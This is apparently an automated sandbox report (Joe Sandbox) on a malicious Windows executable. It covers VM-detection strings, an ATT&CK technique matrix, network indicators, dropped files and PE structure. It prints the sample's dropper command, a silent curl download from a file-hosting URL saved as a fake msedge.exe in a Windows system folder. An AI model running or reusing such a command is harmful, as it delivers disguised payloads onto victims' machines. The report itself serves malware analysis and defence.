    Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.0.drBinary or memory string: vmci.sys
    Source: Amcache.hve.0.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: 4sTTCruY06.exe, 00000000.00000002.3336102479.000002594CF1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.0.drBinary or memory string: VMware20,1
    Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD1230 CreateThread,GetSystemMetrics,GetSystemMetrics,CreateFileA,CreateToolhelp32Snapshot,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,GetModuleHandleA,GetCurrentProcessId,FreeLibrary,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,0_2_00007FF69DCD1230
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE0710 QueryPerformanceFrequency,QueryPerformanceCounter,malloc,LoadLibraryA,GetProcAddress,GetProcAddress,0_2_00007FF69DCE0710
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD1D328 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF69DD1D328
    Source: C:\Users\user\Desktop\4sTTCruY06.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exeJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD1DCD0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF69DD1DCD0
    Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    21
    Input Capture
    1
    System Time Discovery
    Remote Services21
    Input Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    11
    Process Injection
    LSASS Memory21
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
    Obfuscated Files or Information
    NTDS1
    File and Directory Discovery
    Distributed Component Object ModelInput Capture3
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets2
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522833 Sample: 4sTTCruY06.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 64 21 file.garden 2->21 29 Multi AV Scanner detection for submitted file 2->29 31 Yara detected BlockedWebSite 2->31 33 AI detected suspicious sample 2->33 8 4sTTCruY06.exe 2 2->8         started        signatures3 process4 process5 10 cmd.exe 1 8->10         started        12 conhost.exe 8->12         started        process6 14 curl.exe 2 10->14         started        dnsIp7 23 file.garden 188.114.96.3, 443, 49706 CLOUDFLARENETUS European Union 14->23 25 127.0.0.1 unknown unknown 14->25 19 C:\Windows\Speech\msedge.exe, HTML 14->19 dropped 27 Creates HTML files with .exe extension (expired dropper behavior) 14->27 file8 signatures9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    4sTTCruY06.exe21%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://upx.sf.net0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    file.garden
    188.114.96.3
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.cloudflare.com/learning/access-management/phishing-attack/curl.exe, 00000003.00000003.2089724979.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089833939.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089781752.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089881481.0000022B46EC0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe.3.drfalse
          unknown
          http://upx.sf.netAmcache.hve.0.drfalse
          • URL Reputation: safe
          unknown
          https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binlrccurl.exe, 00000003.00000002.2090175602.0000022B46EA8000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://www.cloudflare.com/5xx-error-landingcurl.exe, 00000003.00000003.2089781752.0000022B46F05000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089724979.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089833939.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089781752.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089881481.0000022B46EC0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe.3.drfalse
              unknown
              https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin--outputC:curl.exe, 00000003.00000002.2090175602.0000022B46EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                188.114.96.3
                file.gardenEuropean Union
                13335CLOUDFLARENETUSfalse
                IP
                127.0.0.1
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1522833
                Start date and time:2024-09-30 18:30:01 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 41s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:4sTTCruY06.exe
                renamed because original name is a hash value
                Original Sample Name:38c2636423b5916077207678dd1adbc782d863342e75fdcaabad162d8f8e2824.exe
                Detection:MAL
                Classification:mal64.phis.winEXE@7/3@1/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: 4sTTCruY06.exe
                No simulations
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.96.3docs.exeGet hashmaliciousFormBookBrowse
                • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                • wwvmicrosx.live/office365/office_cookies/main/
                http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                • mobilelegendsmycode.com/favicon.ico
                http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                • www.chinaen.org/zi4g/
                http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                • www.444317.com/
                Sept order.docGet hashmaliciousFormBookBrowse
                • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                1e#U0414.exeGet hashmaliciousLokibotBrowse
                • dddotx.shop/Mine/PWS/fre.php
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                file.gardengh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                • 188.114.96.3
                seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                • 188.114.96.3
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSgh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                • 188.114.96.3
                seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                • 188.114.96.3
                docs.exeGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                • 104.18.35.212
                https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                • 1.1.1.1
                https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                • 104.22.52.71
                https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                • 172.67.148.87
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                74954a0c86284d0d6e1c4efefe92b521Cr4745ElZg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 188.114.96.3
                gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                • 188.114.96.3
                seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                • 188.114.96.3
                Setup_10024.exeGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                • 188.114.96.3
                9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                • 188.114.96.3
                U4hM4c3l4m.lnkGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                f1w58Se3jL.lnkGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                No context
                Process:C:\Windows\System32\curl.exe
                File Type:HTML document, ASCII text, with very long lines (394)
                Category:dropped
                Size (bytes):4420
                Entropy (8bit):5.0991852558769555
                Encrypted:false
                SSDEEP:96:1j9jwIjYjUDK/D5DMF+BOisvEA2ZLimJrR49PaQxJbGD:1j9jhjYjIK/Vo+tsgZOmJrO9ieJGD
                MD5:CC35EC5D3A4A4C996DB52DE380451B12
                SHA1:3EB83AD83288B6B93993481B368947274896300A
                SHA-256:4E9EF918E74416C4D4C14AFA3B44FA27EA74169CE9F3473B0B075DB277BEBBA3
                SHA-512:3A006C807E8B46F1479F449091964CF42A4C8BFBFA85A1F801FFAD8D9FF50FBF1FCF9DFDF376BD4D115188DBEF54A73A391911994655AA543100D2ACBF480320
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_BlockedWebSite, Description: Yara detected BlockedWebSite, Source: C:\Windows\Speech\msedge.exe, Author: Joe Security
                Reputation:low
                Preview:<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded
                Process:C:\Users\user\Desktop\4sTTCruY06.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.418957380076598
                Encrypted:false
                SSDEEP:6144:1Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:8vloTMW+EZMM6DFyn03w
                MD5:273FD69CDD01C4B4F7DF41DEE0D542D5
                SHA1:A84F164159A633AFF76E85C844E17067932F44E9
                SHA-256:2F4782C7956A1C0DA1B71BDC02475EE038E8FAB6368536560FD9F721D75B03F9
                SHA-512:0DF0B54A6160604F989C5062C55B71F019B5ED6F70718CEB34B230EBFF2C84A846D8C97D3C91D06369ED779EDABD68516233C1A2F20BE828B680E49AF41DC711
                Malicious:false
                Reputation:low
                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....V.................................................................................................................................................................................................................................................................................................................................................+........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\4sTTCruY06.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):64
                Entropy (8bit):4.260933985216441
                Encrypted:false
                SSDEEP:3:lQe9GXs9ZA0Ysys:lG8ZA09
                MD5:F7960A2BD35F4A3D46E9A024EA0D6BED
                SHA1:87475F7A5771DDC0FC310564F7B02D11A28D39EC
                SHA-256:28220B078254224B32254F1AFA92890C4A2609E0503AA8E60107ACC59047A299
                SHA-512:F6FE84FB9659536BE4DD6F5977760E1C01CAD666A4FB53C17476922DD489D5B6C57A1E357CF57E8F0FE2B1FC6F30679CC818D748D63966A2C0A8286DDEBCE0A6
                Malicious:false
                Reputation:low
                Preview:(!) failed to establish a connection with the kernel module.....
                File type:PE32+ executable (console) x86-64, for MS Windows
                Entropy (8bit):6.582012244110496
                TrID:
                • Win64 Executable Console (202006/5) 92.65%
                • Win64 Executable (generic) (12005/4) 5.51%
                • Generic Win/DOS Executable (2004/3) 0.92%
                • DOS Executable Generic (2002/1) 0.92%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:4sTTCruY06.exe
                File size:403'456 bytes
                MD5:5a4bbfbb9e1269cbc36a6371d77acbfc
                SHA1:807a3b64b0ce44a80e3c7e347b5a02372e28892e
                SHA256:38c2636423b5916077207678dd1adbc782d863342e75fdcaabad162d8f8e2824
                SHA512:9ade757c461baa3557dcfbcbd12f3b27d88c840dde868ac72a2fd42bcee28b3f5a824f2f5ca87b352292765643d90521c1fc3ffedf7f20e7fee6ecaad5602590
                SSDEEP:6144:pC2WnIqpPtmfI4+wFhkEVqgIKDqXbI6spwyuw8uLn6xTY:wGWXqguLn
                TLSH:1484AE85E1A504E5D4ABB07881BBB20BF635345C0B104ADB73EC45942FA37E47FBAB52
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.b......................6.......6.......6.......6..............u3..............M7......M7......M7......M7......Rich...........
                Icon Hash:00928e8e8686b000
                Entrypoint:0x14004d704
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x140000000
                Subsystem:windows cui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x66E95D35 [Tue Sep 17 10:43:01 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:053b3e9d25d46ca0200404421430cbce
                Instruction
                dec eax
                sub esp, 28h
                call 00007F5E90D23268h
                dec eax
                add esp, 28h
                jmp 00007F5E90D22B17h
                int3
                int3
                dec eax
                sub esp, 28h
                dec ebp
                mov eax, dword ptr [ecx+38h]
                dec eax
                mov ecx, edx
                dec ecx
                mov edx, ecx
                call 00007F5E90D22CB2h
                mov eax, 00000001h
                dec eax
                add esp, 28h
                ret
                int3
                int3
                int3
                inc eax
                push ebx
                inc ebp
                mov ebx, dword ptr [eax]
                dec eax
                mov ebx, edx
                inc ecx
                and ebx, FFFFFFF8h
                dec esp
                mov ecx, ecx
                inc ecx
                test byte ptr [eax], 00000004h
                dec esp
                mov edx, ecx
                je 00007F5E90D22CB5h
                inc ecx
                mov eax, dword ptr [eax+08h]
                dec ebp
                arpl word ptr [eax+04h], dx
                neg eax
                dec esp
                add edx, ecx
                dec eax
                arpl ax, cx
                dec esp
                and edx, ecx
                dec ecx
                arpl bx, ax
                dec edx
                mov edx, dword ptr [eax+edx]
                dec eax
                mov eax, dword ptr [ebx+10h]
                mov ecx, dword ptr [eax+08h]
                dec eax
                mov eax, dword ptr [ebx+08h]
                test byte ptr [ecx+eax+03h], 0000000Fh
                je 00007F5E90D22CADh
                movzx eax, byte ptr [ecx+eax+03h]
                and eax, FFFFFFF0h
                dec esp
                add ecx, eax
                dec esp
                xor ecx, edx
                dec ecx
                mov ecx, ecx
                pop ebx
                jmp 00007F5E90D22442h
                int3
                dec eax
                and dword ptr [ecx+10h], 00000000h
                dec eax
                lea eax, dword ptr [000030F0h]
                dec eax
                mov dword ptr [ecx+08h], eax
                dec eax
                lea eax, dword ptr [000030D5h]
                dec eax
                mov dword ptr [ecx], eax
                dec eax
                mov eax, ecx
                ret
                int3
                int3
                dec eax
                sub esp, 48h
                dec eax
                lea ecx, dword ptr [esp+20h]
                call 00007F5E90D22C77h
                dec eax
                lea edx, dword ptr [00010617h]
                dec eax
                lea ecx, dword ptr [eax+eax+00h]
                Programming Language:
                • [IMP] VS2008 SP1 build 30729
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x5e0040x17c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x1e8.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x610000x30c0.pdata
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x670000x390.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x581e00x38.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x582800x28.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x580a00x140.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x500000x638.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x4ea530x4ec004fb1d312f855943b3a3170d577715158False0.5324032738095238data6.501359649610373IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x500000xf8100xfa0071f59c19a44e159ed0427039ffe665a5False0.5193125data6.1031968650352875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x600000xbf00x40049ce7e618d2f855b7b90357827ec0019False0.2919921875DOS executable (block device driver)3.2889610627375783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .pdata0x610000x30c00x3200fea69b7fe8aae2e13bbb7b9369af0465False0.462265625data5.700380768504395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                _RDATA0x650000x1d00x20090c1a4c095bdcd0bd7c466f09ff97faaFalse0.37890625data4.523192804901079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc0x660000x1e80x200244e0e52b6cfc88b8356969084fb3b61False0.5390625data4.768131151703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x670000x3900x4001a4d7d7192e5ceb60f8ab9a335dac936False0.59765625data5.045093521487934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_MANIFEST0x660600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                DLLImport
                KERNEL32.dllLoadLibraryA, QueryPerformanceFrequency, GetProcAddress, QueryPerformanceCounter, GlobalAlloc, GlobalFree, GlobalLock, WideCharToMultiByte, GlobalUnlock, GetLocaleInfoEx, FormatMessageA, LocalFree, GetCurrentThreadId, SleepConditionVariableSRW, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, CreateThread, Sleep, CreateFileW, FindClose, FindFirstFileW, FreeLibrary, GetCurrentThread, GetFileAttributesExW, AreFileApisANSI, GetLastError, GetModuleHandleW, GetFileInformationByHandleEx, WakeAllConditionVariable, GetCurrentProcessId, CloseHandle, Process32FirstW, CreateFileA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetSystemTimeAsFileTime, InitializeSListHead, MultiByteToWideChar, Process32NextW, CreateToolhelp32Snapshot, GetModuleHandleA, SetThreadPriority
                USER32.dllUpdateWindow, RegisterClassExA, SetWindowLongW, LoadCursorW, LoadIconW, TranslateMessage, SetLayeredWindowAttributes, GetAsyncKeyState, DefWindowProcA, PeekMessageW, DispatchMessageW, ShowWindow, SetWindowPos, SetCursorPos, GetCursorPos, CreateWindowExA, GetClientRect, SetCursor, GetForegroundWindow, ClientToScreen, ScreenToClient, GetKeyState, SetClipboardData, GetClipboardData, EmptyClipboard, CloseClipboard, GetSystemMetrics, MessageBoxA, OpenClipboard
                d3d11.dllD3D11CreateDeviceAndSwapChain
